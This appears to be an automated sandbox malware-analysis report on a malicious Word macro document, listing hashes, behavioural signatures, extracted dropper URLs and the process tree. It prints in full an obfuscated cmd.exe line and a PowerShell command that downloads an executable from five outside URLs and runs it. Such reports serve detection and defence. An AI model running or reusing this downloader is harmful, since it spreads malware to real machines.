Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    28-04-2024 01:32

General

  • Target

    0413f92d3b2f6300a0ed5d6d362ef09c_JaffaCakes118.doc

  • Size

    65KB

  • MD5

    0413f92d3b2f6300a0ed5d6d362ef09c

  • SHA1

    e0ed8f26783e15a4fcc44b13997912295dc52bad

  • SHA256

    58c6de98959ad1e8fa0c907b8132e557f516944676936af659f6c80b1ac2804e

  • SHA512

    20ae21f5f8456c4cbb3a294f54aaf4c2ab7330a2d994f91eee7ac2f1a56b08697821af3158f3050d37878b166d8a9930ba12ccefb2f9339c87b921acef952388

  • SSDEEP

    768:cpJcaUitGAlmrJpmxlzC+w99NBz+1o80cZBv0fNNfw/i9m57MI2:cptJlmrJpmxlRw99NBz+a8vBi

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (type: exe.dropper)
    http://abporter.org/zhniYMNIL
    http://bearinmindstrategies.com/of7Cpb8
    http://ondacapital.es/EwCyzzc
    http://landspa.ir/Nl9U64Eg0
    http://shoshana.ge/QwlUmzzVaF

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0413f92d3b2f6300a0ed5d6d362ef09c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2824
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2948
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V^:ON/C"^se^t ^Ke= ^ ^ ^ ^ ^ ^ ^ }^}{hc^tac};^kaer^b^;zkw$ ^m^e^tI^-^e^kovn^I;)zk^w^$ ,^Z^UV$(^eliFdao^ln^woD^.a^z^l${^yrt{)j^FV$^ ni ZUV$(^hcaerof;'^e^xe^.^'^+q^pv$+'\^'^+c^ilbu^p:vne$=^z^kw$;^'^45^6^' =^ q^pv$;)'^@'(^t^ilp^S^.^'^F^aV^z^zm^U^lwQ/^eg.^ana^h^s^o^h^s//^:p^t^t^h@0gE4^6U^9^lN/ri^.^ap^sdn^al//^:ptt^h@cz^zyCwE/^s^e^.^la^t^i^pac^a^dno//^:^ptth^@^8^b^pC^7f^o/moc.se^ige^tarts^dni^mnira^e^b//^:^pt^th^@^LIN^M^Y^in^hz/gr^o.re^tr^o^pb^a//:^pt^th'=^jFV^$^;^tn^eilCb^eW.^teN tc^e^jb^o-^w^en^=azl^$ ^lleh^srewop&&^for /^L %^D ^in (3^6^7;^-1^;^0)^d^o s^e^t ^if=!^if!!^Ke:~%^D,1!&&i^f %^D ^l^ss ^1 c^a^l^l %^if:^*^if^!=%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $lza=new-object Net.WebClient;$VFj='http://abporter.org/zhniYMNIL@http://bearinmindstrategies.com/of7Cpb8@http://ondacapital.es/EwCyzzc@http://landspa.ir/Nl9U64Eg0@http://shoshana.ge/QwlUmzzVaF'.Split('@');$vpq = '654';$wkz=$env:public+'\'+$vpq+'.exe';foreach($VUZ in $VFj){try{$lza.DownloadFile($VUZ, $wkz);Invoke-Item $wkz;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2696

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize
    20KB
    MD5
    de92ba43c7e24e4385d52143723070d5
    SHA1
    6ebdacaf7f4c63befe0968ef409fb53053f00a63
    SHA256
    b4fd92553288eeb372000c72cce400eaff898b63b561e4483cbb958fa2750775
    SHA512
    5e861082883b51cdc77b057dddf72230b0b17aa1a19c9e5949dacaca47152768967839686119238978c4cf77ba3dbb213c00f16f83619e5e90fdac78e5621e1b
  • memory/2824-11-0x0000000000610000-0x0000000000710000-memory.dmp
    Filesize
    1024KB
  • memory/2824-2-0x0000000070F4D000-0x0000000070F58000-memory.dmp
    Filesize
    44KB
  • memory/2824-8-0x0000000000610000-0x0000000000710000-memory.dmp
    Filesize
    1024KB
  • memory/2824-7-0x0000000000610000-0x0000000000710000-memory.dmp
    Filesize
    1024KB
  • memory/2824-9-0x0000000000610000-0x0000000000710000-memory.dmp
    Filesize
    1024KB
  • memory/2824-0-0x000000002F0C1000-0x000000002F0C2000-memory.dmp
    Filesize
    4KB
  • memory/2824-10-0x0000000000610000-0x0000000000710000-memory.dmp
    Filesize
    1024KB
  • memory/2824-6-0x0000000000610000-0x0000000000710000-memory.dmp
    Filesize
    1024KB
  • memory/2824-19-0x0000000070F4D000-0x0000000070F58000-memory.dmp
    Filesize
    44KB
  • memory/2824-20-0x0000000000610000-0x0000000000710000-memory.dmp
    Filesize
    1024KB
  • memory/2824-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB
  • memory/2824-35-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB
  • memory/2824-36-0x0000000070F4D000-0x0000000070F58000-memory.dmp
    Filesize
    44KB